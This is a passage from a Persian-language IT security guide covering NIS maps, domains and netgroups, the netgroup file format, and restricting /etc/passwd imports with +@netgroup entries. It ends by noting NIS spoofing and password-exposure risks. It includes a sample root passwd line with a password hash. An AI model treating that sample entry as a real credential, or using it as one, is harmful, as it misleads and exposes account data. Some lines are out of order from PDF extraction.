‫‪154 Lightweight Directory Access Protocol‬‬
‫‪155 NIS Maps‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٣٠‬‬

‫ﺍﺳﺎﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺮﺩﺍﺭﻳﺪ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻓﺎﻳﻞ‪ ،‬ﻣﺎﻟﻜﺎﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺭﺍ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﺩﺍﺩﻩ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ‪ ~user‬ﺩﺭ ﭘﻮﺳﺘﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺑﺪﺭﺳﺘﻲ ﺷﺎﺧﺔ ﺧﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺭﺍ ﻧﮕﺎﺷﺖ ﻛﻨﻨﺪ )ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺁﻥ ﺷـﺎﺧﻪ‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ mount ،NFS‬ﺷﺪﻩ ﺍﺳﺖ(‪.‬‬

‫ﺩﺍﻣﻨﻪﻫﺎﻱ ‪NIS‬‬
‫‪١٥٦‬‬
‫ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﺩﺍﻣﻨﻪﻫﺎ ﻣﺸﺎﺑﻪ ﺩﺍﻣﻨﻪﻫـﺎﻱ ‪DNS‬‬ ‫ﻭﻗﺘﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS‬ﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻲﻛﻨﻴﺪ ﺑﺎﻳﺪ ﻳﻚ ﺩﺍﻣﻨﺔ ‪NIS‬‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺍﻣﻨﻪﻫﺎﻱ ‪ DNS‬ﻳﻚ ﻣﻨﻄﻘﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺩﺍﻣﻨﻪﻫﺎﻱ ‪ NIS‬ﻳﻚ ﮔﺮﻭﻩ ﺭﺍﻫﺒﺮﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﻣﻌـﻴﻦ‬
‫ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﻓﺮﻣﺎﻥ ‪ domainname‬ﺩﺭ ‪ Unix‬ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﻳﻚ ﺩﺍﻣﻨﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻥ ﺗﻨﻬـﺎ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﺩﺍﻣﻨﺔ ‪ NIS‬ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻫﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺩﺍﻣﻨﻪﻫﺎﻱ ‪ NIS‬ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪.‬‬
‫ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﺩﺍﻣﻨﺔ "ﮔﺮﻭﻩ ﺷﺒﻜﻪ" ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪ .‬ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺩﻭ ﺩﺍﻣﻨﻪ ﺑﻪ ﻳﻚ ﻧﺎ ﹺﻡ ﻣـﺸﺎﺑﻪ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﻧﮕﺎﺭﺷـﻬﺎﻱ‬
‫‪ sendmail‬ﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺩﺍﻣﻨﺔ ‪ NIS‬ﻛﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺣـﺪﺱ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﻧﻘﺎﻳﺺ ‪ NIS‬ﻭ ‪ NFS‬ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﻨـﺪ ﺗﻘﺮﻳﺒـﹰﺎ ﻫﻤﻴـﺸﻪ ﻗﺒـﻞ ﺍﺯ ﻫـﺮ‬
‫ﺍﻧﺠﺎﻡ ﻫﺮ ﺗﻼﺷﻲ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪) .‬ﺍﻟﺒﺘﻪ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ‪ NIS‬ﻛﻤﺎﻛـﺎﻥ‬
‫ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺗﻌﻴﻴﻦ ﺍﺳﺖ‪(.‬‬

‫ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ‪NIS‬‬

‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ‪ ١٥٧NIS‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﮔﺮﻭﻫﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ‪ .‬ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ‬
‫ﺍﺻﻞ ﺷﺒﻴﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺤﻠﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻧﻬﺎ‪.‬‬
‫ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺳﺎﺩﻩﺳﺎﺯﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺍﺷﺘﺒﺎﻩ ﺍﺳﺖ‪ .‬ﺑـﺎ ﻣـﺸﺨﺺ ﻛـﺮﺩﻥ ﻭ ﺍﺳـﺘﻔﺎﺩﺓ ﺻـﺤﻴﺢ ﺍﺯ‬
‫ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺍﻓﺮﺍﺩ ﻭ ﻣﺎﺷﻴﻨﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﺍﺩ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ‪ NIS‬ﺩﺭ ﻓﺎﻳﻞ ‪ /usr/etc/netgroup‬ﻳﺎ ‪ /etc/netgroup‬ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﻓﺎﻳﻞ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺧﻂ ﺩﺭ ﻗﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬

‫… ‪Groupname member1 member2‬‬


‫ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﻚ ﺩﺍﻣﻨﺔ ‪ NIS‬ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ‪ .‬ﻗﺎﻟﺐ ﺍﻋﻀﺎ ﭼﻨﻴﻦ ﺍﺳﺖ‪:‬‬
‫)‪(hostname, username, domainname‬‬
‫ﺍﮔﺮ ﺟﺎﻱ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ )‪ (username‬ﺧﺎﻟﻲ ﺑﺎﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻫﺮ ﻛﺎﺭﺑ ﹺﺮ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﻋﻀﻮﻱ ﺍﺯ ﮔﺮﻭﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺟﺎﻱ ﻳﻚ ﻧﺎﻡ‬
‫‪١٥٨‬‬
‫ﺩﺍﻣﻨﻪ )‪ (domainname‬ﺧﺎﻟﻲ ﺑﺎﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺩﺍﻣﻨﺔ ﺟﺎﺭﻱ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﻧﺼﺐ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ‬


‫ﺑﺮﻧﺎﻣﺔ ‪) /etc/yp/makedbm‬ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣﺴﻴﺮ ‪ /usr/etc/yp/makedbm‬ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ( ﻓﺎﻳﻞ ﮔﺮﻭﻩ ﺷـﺒﻜﻪ ﺭﺍ ﺩﺭ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻛﻪ ﺩﺭ ﻣﺴﻴﺮﻫﺎﻱ ﺯﻳﺮ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﺪ‪:‬‬

‫‪156 NIS Domain‬‬


‫‪157 NIS Netgroups‬‬
‫‪ ۱۵۸‬ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺳﺎﺧﺘﻪ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ(‪ ،‬ﻳـﺎ ﻳـﻚ ﻧـﺎﻡ‬
‫ﻣﻴﺰﺑﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭﻟﻲ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺍﺯ ﻣﻴﺰﺑﺎﻧﻬﺎ(‪ .‬ﺳﺎﺧﺘﻦ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑﻌﻀﻲ ﺍﺯ ﺍﻋﻀﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻫـﺴﺘﻨﺪ ﻭ ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺍﻋﻀﺎ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺧﻄﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪.‬‬
‫‪٣٣١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪/etc/yp/domainname/netgroup.dir‬‬
‫‪/etc/yp/domainname/netgroup.pag‬‬
‫‪/etc/yp/domainname/netgroup.byuser.dir‬‬
‫‪/etc/yp/domainname/netgroup.byuser.pag‬‬
‫‪/etc/yp/domainname/netgroup.byhost.dir‬‬
‫‪/etc/yp/domainname/netgroup.byhost.pag‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﻌﻀﻲ ﻣﺎﺷﻴﻨﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ‪ /etc/yp‬ﺑﺼﻮﺭﺕ ﺳﻤﺒﻠﻴﻚ ﺑﻪ ‪ /var/yp‬ﻟﻴﻨﻚ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﻛﻮﭼﻜﻲ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻨﻬـﺎ ﺩﻭ ﮔـﺮﻭﻩ ﺷـﺒﻜﻪ ﺑـﺴﺎﺯﻳﺪ؛ ﻳﻜـﻲ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﺩﻳﮕـﺮﻱ ﺑـﺮﺍﻱ ﻛﻠﻴـﺔ ﻣﺎﺷـﻴﻨﻬﺎﻱ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‪ .‬ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺍﻳﺠﺎﺩ ﻭ ﺭﺍﻫﺒﺮﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻼ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﮔﺮﻭﻩ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺮ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺑﺴﺎﺯﻳﺪ‪ .‬ﺁﻧﮕﺎﻩ ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬ ‫ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﮔﺮﻭﻩ ﺑﺴﺎﺯﻳﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻳﻚ ﮔﺮﻭﻩ ﺍﺻﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷﺎﻣﻞ ﻫﻤﺔ ﺯﻳﺮﮔﺮﻭﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺎﺷﺪ‪ .‬ﺍﻟﺒﺘﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﻴﻦ ﻛﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬
‫ﻳﻚ ﺩﭘﺎﺭﺗﻤﺎﻥ ﻋﻠﻮﻡ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺧﺘﺎﺭ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬

‫)‪Math (mathserve,,) (math1,,) (math2,,) (math3,,‬‬


‫)‪Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,‬‬
‫)‪Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,‬‬
‫‪Science Math Chemistry Biology‬‬
‫ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺍﺯ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻫﺴﺘﻨﺪ ﭼﻮﻥ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛـﺮﺩﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻣﺎﺷـﻴﻨﻬﺎﻳﻲ ﻛـﻪ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﺓ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛـﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﻧﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ‪ NFS‬ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ ﻛـﺮﺩﻥ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﻛـﺴﻲ ﺑـﻪ ‪partition‬ﻫـﺎ ﻭ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩ ﻧﻈﻴـﺮ‬
‫‪ /etc/passwd‬ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﺑﻬﺮﻩ ﺑﺒﺮﻳﺪ‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩﻛﺮﺩﻥ ﻭﺭﻭﺩ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬


‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗﺴﻬﻴﻼﺕ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺑﻮﺳﻴﻠﺔ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﻭﺍﺭﺩ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻓﻘﻂ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻳﻚ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺧﺎﺹ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺍﺯ ﻋﻼﻣﺖ ﺟﻤﻊ )‪ (+‬ﻭ ﻳﻚ ﻧـﺸﺎﻧﻪ @ ﺑـﻪ‬
‫ﻫﻤﺮﺍﻩ ﻧﺎﻡ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﺪ‪:‬‬

‫‪root:si 4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh‬‬


‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪+@operators::999:999:::‬‬
‫ﺩﺳﺘﻮﺭﺍﺕ ﺑﺎﻻ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻩ ﻣﺘﺼﺪﻱﻫﺎ ﻓﻬﺮﺳﺖ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﺯ ﻧﮕﺎﺷﺖ ‪ NIS‬ﺑﻪ ﺣﺎﻓﻈﻪ ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺍﮔـﺮ‬
‫ﺍﺳﺘﺜﻨﺎﻫﺎ ﺭﺍ ﻗﺒﻞ ﺍﺯ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻓﻬﺮﺳﺖ ﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻋﻼﻣﺖ ﺗﻔﺮﻳﻖ )‪ (-‬ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﻣـﺴﺘﺜﻨﻲ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻧﻤﺎﺩﻫﺎﻱ ‪ +@netgroup‬ﻭ ‪ -@netgroup‬ﺭﻭﻱ ﻫﻤﺔ ﻧﺴﺨﻪﻫﺎﻱ ‪ NIS‬ﻛﺎﺭ ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺗﺎ ﻛﻨﻮﻥ ﺭﻭﻱ ﺑﻘﻴﻪ ﻧﺴﺨﻪﻫﺎ ﻫـﻢ ﺑـﺼﻮﺭﺕ‬
‫ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﺭ ﻧﻜﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﮔﺮ ﻗﺼﺪ ﺩﺍﺭﻳﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ ،‬ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬـﺎ ﻫﻤﺎﻧﮕﻮﻧـﻪ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﺷﻮﺩ ﮐﻪ ﺻﺮﻑ ﺧﻮﺍﻧﺪﻥ ﺍﺳﻨﺎﺩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ‪.‬‬

‫ﻣﺤﺪﻭﺩﻳﺖﻫﺎﻱ ‪NIS‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ،NIS‬ﻧﻘﻄﻪ ﺷﺮﻭﻉ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻮﻓﻖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ‪ Unix‬ﺑﻮﺩ‪ .‬ﭼﻮﻥ ‪ NIS‬ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻛﻨﺘـﺮﻝ ﻣـﻲﻛﻨـﺪ‪،‬‬
‫ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS‬ﺭﺍ ﻗﺎﻧﻊ ﻛﻨﻴﺪ ﻛﻪ ﺭﻭﻱ ﻛﻞ ﺷﺒﻜﻪ ﺍﻋﻼﻡ ﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﺍﺭﻳﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻥ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٣٢‬‬

‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺁﻥ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ NIS .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ ﻣﺜـﻞ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬
‫ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ ‪ NIS‬ﭼﻨﺪ ﻧﻘﺺ ﻃﺮﺍﺣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ ‪ NIS‬ﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺠﺪﺩ‬
‫ﻭ ﮔﻤﺮﺍﻩ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺑﻪ ﺩﻭ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ :‬ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺗﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻭ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ‪.NIS‬‬

